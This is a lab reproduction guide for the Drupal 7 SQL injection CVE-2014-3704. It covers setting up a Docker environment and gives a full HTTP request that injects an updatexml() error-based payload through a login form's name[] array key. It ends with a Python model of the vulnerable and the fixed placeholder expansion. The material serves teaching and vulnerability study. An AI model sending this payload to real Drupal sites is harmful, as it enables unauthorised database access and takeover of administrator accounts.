Vulnerability introduction
Drupal is a widely used CMS, and the versions listed below contain a SQL injection vulnerability (CVE-2014-3704) that requires no authentication. Through it, an attacker can execute arbitrary SQL statements, insert or modify administrator accounts, and ultimately execute arbitrary code.
Affected version
- 7.0-7.31
Environment build
1. Switch to the Drupal directory of the vulhub repository and bring up the Docker environment:

```
cd /root/vulhub/drupal/CVE-2014-3704
docker-compose build
docker-compose up -d
```
2. Check the status of the containers:

```
docker ps -a
```
3. After the environment starts, visit `http://your-ip:8080` to reach the Drupal installation page, and install with the default configuration.
For the database settings, use `drupal` as the MySQL database name, `root` as both the database user name and password, and `mysql` as the database host.
4. Once installed, the site renders normally, as shown in the screenshot.
Vulnerability reproduction
1. Use Burp Suite's Repeater module to send the following request (note the blank line that separates the headers from the body):

```
POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
```
2. Switch the response to the Render tab in Repeater to view the result: the database error raised by the injected `updatexml()` call, carrying the output of `user()`, appears in the rendered page.
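To show why the `name[...]` parameters in the request above reach the SQL text, here is an added Python model (not Drupal's PHP and not part of the original page) of the placeholder-expansion routine in Drupal 7's database layer, before and after the fix. The query string and the PHP-style array parsing are constructed for illustration; only the shape of the login lookup is modelled, not Drupal's exact SQL.

```python
from urllib.parse import parse_qs

# Constructed query in the shape of Drupal's login lookup: a single
# placeholder that the database layer expands when bound to an array.
QUERY = "SELECT * FROM {users} WHERE name IN (:name) AND status = 1"

# Form body from the request shown above (constructed copy). PHP turns
# name[key]=value pairs into an array whose keys come verbatim from the client.
BODY = ("pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
        "&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a")


def php_style_array(body, field):
    """Mimic PHP's field[key]=value parsing: return {key: value} in request order."""
    out = {}
    for k, vals in parse_qs(body, keep_blank_values=True).items():
        if k.startswith(field + "[") and k.endswith("]"):
            out[k[len(field) + 1:-1]] = vals[0]
    return out


def expand_vulnerable(query, args):
    """Pre-fix expansion: the array *keys* from the request are appended to the
    placeholder name, and those names are spliced straight into the SQL string."""
    for placeholder, value in list(args.items()):
        if not isinstance(value, dict):
            continue
        new_keys = {f"{placeholder}_{i}": v for i, v in value.items()}
        del args[placeholder]
        args.update(new_keys)
        query = query.replace(placeholder, ", ".join(new_keys))
    return query, args


def expand_fixed(query, args):
    """Post-fix expansion: suffixes come from a counter, so client-controlled
    keys never reach the SQL text; only the values are bound as parameters."""
    for placeholder, value in list(args.items()):
        if not isinstance(value, dict):
            continue
        new_keys = {f"{placeholder}_{i}": v for i, v in enumerate(value.values())}
        del args[placeholder]
        args.update(new_keys)
        query = query.replace(placeholder, ", ".join(new_keys))
    return query, args


if __name__ == "__main__":
    name = php_style_array(BODY, "name")
    print(expand_vulnerable(QUERY, {":name": name})[0])  # injected text in SQL
    print(expand_fixed(QUERY, {":name": name})[0])       # only :name_0, :name_1
```

The vulnerable expansion yields `name IN (:name_0 or updatexml(...)#, :name_0)`, so the `#` comments out the remainder of the statement; the fixed expansion yields `name IN (:name_0, :name_1)` with `bob` and `a` bound as values.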